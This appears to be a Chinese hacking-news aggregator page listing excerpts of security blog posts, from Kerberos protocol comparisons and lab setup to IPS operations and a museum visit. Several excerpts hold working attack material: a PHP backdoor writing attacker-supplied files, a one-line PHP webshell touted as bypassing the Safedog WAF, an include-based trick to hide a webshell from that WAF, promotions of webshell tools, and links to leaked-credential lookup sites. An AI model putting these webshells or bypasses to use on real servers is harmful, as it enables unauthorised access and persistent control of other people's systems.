记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

Kerberos、RADIUS、TACACS+、Diameter协议区别

最近在研究身份认证与访问控制的内容,CISSP ALL IN ONE第六版中,比较详细的解释了四种有关协议的定义、协议运行流程、协议特点。但是没有汇总在一起作比较,所以理解起来很容易混乱。 我用下面一个简单的表格,把相关内容汇总在一起做比较,希望能彻底搞清楚,记牢靠。 难免有不准确的地方,希望看到的高人、前辈多多指点。    
发布时间:2016-03-21 03:25 | 阅读:269296 | 评论:0 | 标签:安全相关

搭建WebGoat和DVWA

在虚拟机下搭建了WebGoat和DVWA以供测试。 WebGoat部署最简单,批处理运行一下就可以用了。这里说一点。有时候希望把搭建好的WebGoat提供给内网更多的用户访问,默认情况下只能本机用localhost使用,这就需要修改tomcat的配置。 在WebGoat目录下找到tomcat文件夹,找server_80.xml,里面有一行: Connector address=”127.0.0.1″ port=”80″ maxHttpHeaderSize=”8192″ 把其中的adress=“127.0.0.1”删掉,保存,然后重启tomcat即可。 这一句的意思是,默认情况下只允许本机环回地址127.0.0.1连接使用。   DVWA部署也不复杂,下载XAMPP装
发布时间:2016-02-22 00:45 | 阅读:364516 | 评论:0 | 标签:安全相关 DVWA WebGoat XAMPP

Gartner WAF 2015 魔力象限节选翻译

工作原因,最近开始研究主流市场的各类WAF产品。Gartner的魔力象限分析是必不可少的重要材料。节选了部分2015年度WAF领域的报告翻译了出来,给自己存个档。 —————————分割线————————————– waf市场被用户需求驱动,用户需要保护内部和公开的web应用,在web应用本地部署或者远程部署。waf部署在web服务器前面用来保护web应用,对抗内外部攻击者。也可以部署为镜像模式,收集访问日志用于合规审计和分析。waf常见的部署方式是以
发布时间:2016-02-02 22:05 | 阅读:226983 | 评论:0 | 标签:安全相关 Fortinet Gartner Imperva waf 魔力象限

网络安全公司网屏(NetScreen)的研究

刚刚在弯曲评论看到这份分析NetScreen的文档,内容翔实,值得研究。 作为华人在硅谷创业成立的安全公司,NetScreen是第一家,也是具有丰碑意义的一家。 至今国内做安全网关设备厂家的研发团队里,都还能看到出自当年那个叱咤风云的NetScreen团队的精英。 下载:传送门 原文:传送门 以此作为2015年博客的最后一篇纪念吧。 预祝各位2016年步步高升!  
发布时间:2016-01-01 00:55 | 阅读:71637 | 评论:0 | 标签:安全相关 netscreen

偶遇BASH攻击,险入僵尸网络

上个月分析系统日志时,意外发现一例利用BASH ShellShock漏洞的攻击,研究起来挺有趣,写出来做个记录。   每隔几天都会看一看边界安全设备的日志,看看都拦下来哪些攻击,有没有漏掉的。10月12号起,拦截了不少利用BASH ShellShock漏洞的攻击数据。攻击源地址几乎遍布全球,攻击目的地址覆盖了公司公布在互联网的所有业务系统,而且发起的时间没有什么规律。唯一显著的特点是,攻击者在短时间内发起攻击的次数比较多,可以判断肯定不是手工操作的。于是,从攻击频率入手分析,兴许能发现点什么。   我把所有这个类型的攻击日志按源地址分组后,再按发起时间做了排序,果然发现一个规律。每个攻击IP发起每轮攻击,基本上都以31次为固定频率,每轮平均耗时15秒。 我又开nmap扫了一下这些攻击源IP,
发布时间:2015-12-01 22:35 | 阅读:73639 | 评论:0 | 标签:安全相关

传统企业的IPS运维

这篇东西主要谈论传统行业公司的安全部门,在日常运维中针对IPS可能遇到的问题,以及个人经验总结。和互联网企业的安全运维并非一个范畴的东西,和传统企业的IT运维有明星区别。   传统行业的公司,与互联网公司的最大区别,在于主营业务和主营产品的不同。这是句废话。但这句废话直接决定了两种类型公司在面对安全问题的思路会有些许区别。互联网公司的产品就是互联网产品、网站系统,所以他们面对的互联网攻击数量更多,威胁也更丰富。加之互联网公司的员工绝大部分都是具备一定开发能力的程序员,根据目前我看到的情况来说,互联网公司在处理网络攻击时,更喜欢自建一套产品。一方面,自开发产品更能针对自己的业务特性和需要,另一方面,自开发产品可以更能满足互联网公司大流量高并发的需求,最后,成本也更容易控制。 传统行业公司不具备足够数量的
发布时间:2015-07-30 17:45 | 阅读:100167 | 评论:0 | 标签:安全相关 IPS 日志 漏报 误报

河南博物院的“穿越之物”

去西安玩,逛了逛陕西博物馆。去苏州玩,第一站就是苏州博物馆。可家门口的河南博物院我还从来没去过,说来还真有点遗憾。趁周末,补上了这一课。 河南作为考古大省,也是文物大省,在河南省内挖掘到的文物大多陈列在省博物院,特别珍贵的国宝级文物转移去了国家博物院。覆盖的历史时期从夏商时期一直延绵到清朝。从文物数量和质量上,河南博物院都不输于任何一座省级博物馆。 河南博物院地处郑州市北二环路上,也即农业路上。原来,坐BRT公交车去那里很方便,但最近农业路全线都在建设快速高架桥,路中间全部是正在施工的工地,通行能力只有正常时的1/3,很多公交车也都改了线,外地朋友建议还是打车去比较靠谱。 在大门的东侧人工窗口或者自助机都可以凭身份证可以免费领取门卡,我去的时候是下午一点,整个博物院里人都很少,图的就是个清净。进入大厅以后,可以
发布时间:2015-06-16 00:35 | 阅读:68088 | 评论:0 | 标签:安全相关

开源网站管理工具——Altman

Altman,the webshell tool,自己写的一款开源软件。0×00前言之前用过几款webshell工具,有B/C的也有C/S的,有的只能用于php或者aspx,当然个人用得最多、觉得用得舒服的也只有菜刀了。但是毕竟菜刀是好几年之前的产物了,而且也已经停止更新了,用得久了也发现一些问题,但又不好解决。去年的年底,自己突然有了个想法,自己要写一个webshell工具,工具的自定义要最大化,自由度也要最高。(我并不认为这是在重复造轮子,很多时候,自己写个东西出来比仅仅懂得原理学到的东西要多得多。)0×01软件介绍Altman基于.Net4.0开发,兼容Mono,理论上可以运行在windows、linux和mac等平台。(windows和ubuntu平台已经详细测试过,完美运行)是的,一直工作在kali下
发布时间:2014-06-05 19:15 | 阅读:66598 | 评论:0 | 标签:安全相关 Altman

又一款超强PHP后门

这个后门是在渗透某站时遇到的,贴代码:<?php$f = realpath(dirname(__FILE__) . "/../") . $_POST["z1"];$c = $_POST["z2"];$buf = "";for ($i = 0; $i < strlen($c); $i+= 2) $buf.= urldecode("%" . substr($c, $i, 2));@fwrite(fopen($f, "w") , $buf
发布时间:2014-05-25 09:05 | 阅读:79512 | 评论:0 | 标签:安全相关 php后门 后门

【透明互联网】社工库 Social Engineering Data

各种泄露查询,你懂的!QQ群:https://qqgroup.insight-labs.orghttps://s3.amazonaws.com/qqqun./index.html(与insight-labs类似)www.weigongkai.comhttp://qun.594sgk.com/http://chaxun.langzuwl.com/qun密码泄露查询http://cha.xiyv.nethttp://594sgk.com/http://t.easyicon.net/hidden.php(CSDN、人人网、天涯论坛)http://9cha8.cn/index.aspxhttp://lucky.anquanbao.com/(信息模糊)https://haveibeenpwned.com/(国外站)htt
发布时间:2014-04-10 03:30 | 阅读:286678 | 评论:0 | 标签:安全相关 社工库

网站管理软件 – AspxSpy2014 Final

bin牛委托修改并发布,版权归bin牛所有。Bug/建议提交:zcgonvh@rootkit.net.cn祝各位马年大吉,财源滚滚。免责声明:本程序只用于管理员安全检测,使用前请注意环境与法律法规,因使用不当造成的后果本人不承担任何责任。已测试的系统:win2003+iis6+.net 2.0win2008+iis7+.net 4.0win8+iis8+.net 4.5注意:此版本最低需要.net 2.0环境,不再支持.net 1.1。如果目标机器是.net 1.1,请换用AspxSpy2010。由于js问题,建议使用ie8+/ff等浏览器访问,win2003自带的ie6在多个功能页面会显示白板。此版本为开发版本,未进行任何加密,同时不具备免杀功能。如果没有特殊情况,AspxSpy将不再更新(可能更新插件)。如
发布时间:2014-02-11 22:05 | 阅读:121576 | 评论:0 | 标签:安全相关 aspxspy

完美扫描PHP特殊一句话后门脚本

作者 Spider网上公布的各种PHP后门全军覆没针对一些特殊变形的后门需要自己添加特征误报率不到百分之一代码如下 保存为*.phperror_reporting(E_ERROR);ini_set('max_execution_time',20000);ini_set('memory_limit','512M');header("content-Type: text/html; charset=gb2312"); $matches = array( '/function_existss*(s*['|"](popen|exec|proc_open|system|passthru)+['|&quo
发布时间:2013-11-01 18:50 | 阅读:86003 | 评论:0 | 标签:安全相关 php 后门 扫描

用JS给XP的右键加上“打开文件位置”

在WIN7中有了这个功能,并且感觉很好用,但在XP中没有这样的功能,以前都是用BAT实现的,今天扔个JS实现的:function alert( aa ){WScript.Echo(aa);}var ajscontent = "function ShowLinkFileGTarget( linkfile ) "+"{"+" var WshShell = WScript.CreateObject('WScript.Shell');"+" var oShellLink = WshShell.CreateShortcut( linkfile );"+" WshShell.Run(
发布时间:2013-08-24 17:30 | 阅读:66857 | 评论:0 | 标签:安全相关 JS

河马php一句话木马[过狗版]v1.0

【河马】 php一句话木马服务端和客户端【免杀版】软件是一个php脚本木马,将<?php echo $_GET[2]($_GET[0]($_GET[1]));?>写入文件webshell.php中,然后使用软件进行连接,就可以执行OS命令,支持的函数有system,shell_exec,passthru点击这里下载PS:测试可过安全狗
发布时间:2013-08-17 17:40 | 阅读:105428 | 评论:0 | 标签:安全相关 PHP一句话

安全狗拦截webshell简单绕过

将大马写到一个txt文件里面,命名为dama.txt再建一个文本文档,asp的就写入: <!--#include file="dama.txt"-->保存为x.asp两个文件传同目录下,访问 http://www.s.com/x.asp 就是我们的大马了。php的同样的原理,dama.txt php文件写入: <?php require_once ("dama.txt"); ?>这样就可以绕过安全狗了。
发布时间:2013-07-12 20:25 | 阅读:95453 | 评论:0 | 标签:安全相关 webshell 安全狗

PHP批量获取百度搜索结果网址

类似的实现方法很多,这里是使用PHP获取的,关于用途你懂,源码如下:<?php error_reporting(E_ERROR); set_time_limit(0); $keyword = '爱情' ; // 批量关键字$filedir= "test.txt"; $timeout = 20; $startpage = 1; $lastpage = 4; // 抓取量$list = ReadBaiduList($keyword,$timeout,$startpage,$lastpage); $num = count($list); $fp = fopen("$filedir",w);
发布时间:2013-07-12 20:25 | 阅读:250228 | 评论:0 | 标签:安全相关 php

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云